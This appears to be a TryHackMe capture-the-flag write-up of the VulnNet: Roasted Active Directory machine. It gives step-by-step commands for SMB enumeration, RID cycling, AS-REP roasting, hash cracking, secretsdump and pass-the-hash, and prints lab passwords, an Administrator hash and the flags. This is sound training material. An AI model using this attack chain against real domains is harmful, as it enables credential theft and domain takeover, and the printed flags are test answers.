Overview

Difficulty: Easy Platform: TryHackMe Focus Areas: Active Directory Enumeration, SMB, Kerberos, AS-REP Roasting, Lateral Movement, Privilege Escalation

This writeup walks through my full approach to compromising the VulnNet: Roasted machine. The box revolves around Active Directory misconfigurations, particularly around user enumeration and Kerberos abuse.

None
Image: TryHackMe VulnNet: Roasted

Initial Recon

As always, I started with a full port scan using Nmap:

nmap -sC -sV -Pn 10.146.188.199
None
Nmap Scan

Key Findings

The scan revealed several important services:

  • Kerberos (88)
  • LDAP (389)
  • SMB (445)

This immediately suggested an Active Directory environment, so my focus shifted toward domain enumeration and credential harvesting.

SMB Enumeration (Anonymous Access)

I checked for anonymous SMB access:

smbclient -L //10.146.188.199 -N
None
Anonymous SMB Login

Anonymous login was allowed, and I was able to list available shares. I connected to accessible shares and downloaded files:

smbclient //10.146.188.199/VulnNet-Business-Anonymous -N
smbclient //10.146.188.199/VulnNet-Enterprise-Anonymous -N
None
Extracting Anonymous Share Data
None
Extracting Anonymous Share Data

Findings

  • Discovered files containing potential usernames
  • Created a custom username wordlist from gathered data
None
Anonymous Share's Data
None
Anonymous Share's Data

Kerberos Attacks — First Attempt

With usernames in hand, I attempted AS-REP Roasting:

impacket-GetNPUsers vulnnet-rst.local/ -dc-ip 10.146.188.199 -usersfile users.txt
None
AS-REP Roasting

❌ No luck — none of the users had "Do not require Kerberos preauthentication" enabled.

Next, I tried validating usernames using Kerbrute:

kerbrute userenum -d vulnnet-rst.local/ --dc 10.146.181.101 users.txt
None
Kerbrute Username Enumeration

❌ Still no success — no valid usernames confirmed.

SID Enumeration (Breakthrough)

At this point, I pivoted to RID cycling using Impacket:

impacket-lookupsid anonymous@10.146.181.101
None
SID Enumeration

✅ This worked and revealed valid domain users.

This was a key turning point — the earlier username list was incomplete.

AS-REP Roasting — Success

Using the newly discovered usernames:

impacket-GetNPUsers vulnnet-rst.local/ -dc-ip 10.146.181.101 -usersfile username.txt
None
Successful AS-REPRoasting

✅ Successfully retrieved a Kerberos AS-REP hash for one user.

Cracking the Hash

I used Hashcat to crack the hash:

hashcat -m 18200 hash.txt rockyou.txt
None
Successful Hash Cracking using Hashcat

✅ Password recovered successfully.

SMB Access with Credentials

With valid credentials:

smbmap -H 10.146.181.101 -u t-skid -p tj072889*
None
Smbmap Listing Share Permissions

Findings

  • Access to additional shares with read permissions

I connected to those shares:

smbclient //10.146.181.101/NETLOGON -U t-skid
None
NETLOGON Share Data Extraction

Results

  • Found files containing credentials for another user
None
Found Hardcoded Credentials

Lateral Movement

Using the second set of credentials:

smbmap -H 10.146.181.101 -u a-whitehat -p bNdKVkjv3RR9ht
None
Smbmap Listing Share Permission

Then tried to access ADMIN$ and C$ shares data:

smbclient //10.146.181.101/C$ -U a-whitehat
None
C$ Share Data Access
None
User Flag File

Outcome

  • Access to more sensitive data
None
User Flag
  • Retrieved the user flag
User Flag : THM{726b7c0baaac1455d05c827b5561f4ed}

Privilege Escalation

Next, I attempted to dump hashes:

impacket-secretsdump vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.146.181.101
None
Hash Dumping

✅ Successfully dumped hashes, including the Administrator hash

Attempted Hash Cracking

hashcat -m 1000 admin_hash.txt rockyou.txt
None
Hash Cracking using Hashcat

❌ Failed — password not crackable via wordlist.

Pass-the-Hash Attempts

Tried using Impacket PsExec:

impacket-psexec administrator@10.146.181.101 -hashes :c2597747aa5e43022a3a3049a3c3b09d
None
Pass-the-Hash using Psexec

❌ Failed

Then tried Evil-WinRM:

evil-winrm -i 10.146.173.32 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
None
Pass-the-Hash using Evil-WinRM

✅ Success! Gained Administrator access

Final Step

Once inside:

cat C:\Users\Administrator\Desktop\system.txt
None
System Flag

🎉 Retrieved the root flag:

System Flag: THM{16f45e3934293a57645f8d7bf71d8d4c}

Key Takeaways

  • Anonymous SMB access can leak valuable intel
  • RID cycling (lookupsid) is extremely useful when username lists fail
  • AS-REP roasting is powerful when pre-auth is disabled
  • Always check for credential reuse across shares
  • Pass-the-Hash may work differently depending on the tool — don't rely on just one

Tools Used

  • Nmap, smbclient, smbmap, Kerbrute, Impacket suite (GetNPUsers, lookupsid, secretsdump, psexec), Hashcat, Evil-WinRM

Conclusion

This machine highlights the importance of thorough enumeration and persistence. Initial attempts may fail, but alternative techniques like SID enumeration can uncover new attack paths.

If you're preparing for OSCP or similar certifications, this box is excellent practice for:

  • Active Directory attacks
  • Kerberos abuse
  • Lateral movement strategies